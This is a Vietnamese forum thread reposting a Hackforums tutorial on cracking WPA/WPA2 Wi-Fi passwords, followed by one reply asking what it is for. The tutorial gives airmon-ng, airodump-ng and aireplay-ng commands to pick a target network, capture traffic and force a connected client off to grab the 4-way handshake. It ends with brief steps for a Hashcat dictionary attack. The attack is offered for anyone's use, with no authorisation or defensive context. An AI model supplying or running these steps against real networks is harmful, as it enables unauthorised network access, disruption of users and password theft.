Help Cracking Wpa and Wpa2 Encrypted Networks in a Windows Host with a Kali Linux Virtual Machine

phuoc0191vn

Senior
Joined
Jan 10, 2015
Messages
709
Reactions
184
MR
0.187
copy được được từ bên hackforum.net cho ai cần
|Nguồn: http://hackforums.net/showthread.php?tid=4296613
Ai thấy hay cho xin 1 like nào !

Cracking Wpa and Wpa2 Encrypted Networks in a Windows Host with a Kali Linux Virtual Machine



Tools

VmWare Workstation
http://www.vmware.com/products/workstati...evaluation

Kali Linux
http://www.kali.org

OclHashCat
HashCat Gui
http://hashcat.net/oclhashcat

WireShark
http://www.wireshark.org

Dictionary

Identify wireless interface
Code:
airmon-ng


Kill processes that may interfere with airmon-ng
Do not skip or you will have this Error Message
Spoiler

Start monitor mode
Code:
airmon-ng start wlan0


Scan for Wpa and Wpa2 encrypted networks and choose your target
Code:
airodump-ng --encrypt WPA -a mon0


Start capturing packets
Code:
airodump-ng --bssid 00:1E:E5:7A:C4:00 -c 11 -w Wifire mon0


Deauthenticate connected client and capture handshake
Code:
aireplay-ng --deauth 10 -a 00:1E:E5:7A:C4:00 -c 88:12:4E:07:6E:8A mon0


Verify the 4-way handshake is valid in WireShark


Convert .Cap file to .Hccap format


Load dictionary in HashCat


Adjust HashCat's setting and execute the attack
 
cũng chả biết để làm gì luôn.@@
Thấy tiêu đề là crack WPA and WPA2 chả biết có phải là hack pass wifi không nữa?
Ai biết chỉ mình với ( mù tịt về khoản này )
 

Announcements

Forum statistics

Threads
426,344
Messages
7,175,783
Members
178,796
Latest member
lamntp70

Most viewed of week

Most viewed of week

Back
Top Bottom